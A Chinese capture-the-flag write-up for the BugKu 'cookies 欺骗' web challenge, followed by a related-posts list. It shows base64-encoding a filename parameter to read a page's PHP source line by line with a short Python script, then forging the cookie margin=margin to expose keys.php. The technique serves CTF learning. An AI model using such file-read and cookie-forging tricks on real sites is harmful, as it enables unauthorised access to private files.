查看源码后没有可用信息
观察url发现参数filename的值加密了
解密后filename=keys.txt
尝试用修改参数filename的值为index.php(注意此处index.php要用base64加密为aW5kZXgucGhw)

发现参数line没有给值,随意赋值如3,出现

写脚本抓原代码,先试一下有多少行,100,50,25,20都无回显,大约定在30

import requests
a=30
for i in range(a):url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"s=requests.get(url)print (s.text)

读取的源码:

<?phperror_reporting(0);$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");$line=isset($_GET['line'])?intval($_GET['line']):0;if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");$file_list = array('0' =>'keys.txt','1' =>'index.php',);if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){$file_list[2]='keys.php';}if(in_array($file, $file_list)){$fa = file($file);echo $fa[$line];}?>

分析源代码,当cookie的margin=margin时,可以访问一个keys.php文件
注意把参数filename的值改为base64加密后的keys.php

BugKu:cookies 欺骗相关推荐

  1. bugku cookies

    bugku cookies 又是一道花费比奖励还高的bugku web的题: 开环境后是一堆乱码 一开始猜测乱码是不是提示 但是后来想了一下,这是web的题又不是misc的题,所以应该不是编码 习惯性 ...

  2. 七禧舞曲 php,CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day

    应该是通杀所有PHP版本 .最新版本没有测试.从补丁来看,漏洞依然存在. 这是一个神级漏洞,体现了程序员的神逻辑. 看代码 admin/admin_check.php $CD_Version='V1. ...

  3. ctf write cookies欺骗

    题目: 打开网页出现: 发现对line和filename通过get方式传参,其中filename=a2V5cy50eHQ= 猜测是使用了base64加密,解密a2V5cy50eHQ=得到: 可见可以通 ...

  4. Web安全学习思维导图,[web入门菜鸡萌新必备]

    写在前面,自制了一个web安全学习的思维导图,写的并不是很全面,自己本身其实也是个弟弟, 总结了一些师傅们的资源,希望大家给予一定的建议和提升的空间,另外也给萌新一个思路吧~ 下面是大纲,可以参考内容 ...

  5. Bugku—web题解

    前言:最近做了一些Bugku入门的web题目,感觉web题挺有趣的,并非是得出flag,而是可以通过一个题目学习到很多知识. 域名解析 题目说把 flag.baidu.com 解析到123.206.8 ...

  6. Bugku web(1—35)

    1.web2 打开网页: 哈哈,其实按下F12你就会发现flag. 2.计算器 打开网页,只是让你输入计算结果,但是发现只能输入一个数字,这时按下F12,修改一下参数,使之可以输入多个数字,修改后输入 ...

  7. Bugku旧平台web writeup

    Web基础 Web2 查看网页源代码,搜索flag KEY{Web-2-bugKssNNikls9100} 计算器 审查元素修改输入字符串长度为2 flag{CTF-bugku-0032} web基础 ...

  8. [心静不下来系列]bugku web继续 (带了标题)

    [2,1]矛盾---------- is_numeric在php里面是 是数字的意思 这个啊,只要是不是纯数字也可以, 试了一下num=1*1  只要是一个字符串就行....不管是算式也好,一串什么其 ...

  9. bugku web篇

    web2 f12查看源代码在注释语句里面 计算器 直接求给的题目 但是对input的最大输入个数做了限制可以直接f12改限制字数也可以bp抓包修改 web基础$_GET $what=$_GET['wh ...

最新文章

  1. 【原】iOS学习之Quartz2D(1)
  2. [读书笔记]C#中get与set的用法
  3. linux添加怎么退出,linux – 是否可以设置’expect’的退出代码
  4. 2017-2018-1 20155227 《信息安全系统设计基础》第十三周学习总结
  5. java ranger rest_kafka ranger integration issuse
  6. 计算机软件和理论学什么,武汉大学计算机软件与理论考研科目有哪些?
  7. HTML5 Media 原创翻译——第一章(持续更新中)
  8. java崩溃停在崩溃代码上_通过编写Java代码让Jvm崩溃
  9. 欧姆龙OMRON PLC程序,威纶触摸屏螺丝机 配方程序。 用ST语言编写程序+威纶触摸屏程序
  10. 2G维码器-以及4G维码器--基于合宙air202 air720sl luat
  11. 2021-2022启航出发
  12. java内存溢出定位
  13. 一个实用分数类Fraction的Java实现
  14. USACO section2.4 Cow Tours题解代码
  15. 可惜知乎没有注销账号的选项
  16. Datawhale 图神经网络task4
  17. 输入电阻和输出电阻的意义
  18. property_get/property_set函数使用
  19. python 录音翻译_python实现带声音的摩斯码翻译实现方法
  20. 在IB国际高中学IB哲学是种什么样的体验

热门文章

  1. [BZOJ3693]圆桌会议[霍尔定理+线段树]
  2. Android性能优化(3)
  3. springmvc 的 @PathVariable
  4. webconfig节点值里的文字换行问题
  5. Android 如何快速写满存储空间
  6. 使用Flutter之后,我们的CPU占用率降了50%
  7. Mysql索引命中问题
  8. PHP执行批量mysql语句
  9. 开源:Sagit.Framework For IOS 开发框架
  10. 网站微信登录授权 ASP.NET